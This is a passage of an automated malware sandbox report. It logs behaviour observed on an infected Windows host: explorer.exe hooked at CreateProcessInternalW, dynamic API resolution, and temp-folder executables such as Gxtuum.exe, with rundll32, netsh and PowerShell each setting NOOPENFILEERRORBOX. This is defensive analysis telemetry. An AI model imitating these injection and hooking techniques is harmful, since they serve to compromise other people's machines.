                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: explorer.exeUser mode code has changed: module: KERNEL32.DLL function: CreateProcessInternalW new code: 0xE9 0x90 0x00 0x07 0x75 0x5F
                          Source: C:\Windows\explorer.exeCode function: 5_2_0C5B5590 LoadLibraryA,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_0C5B5590
                          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
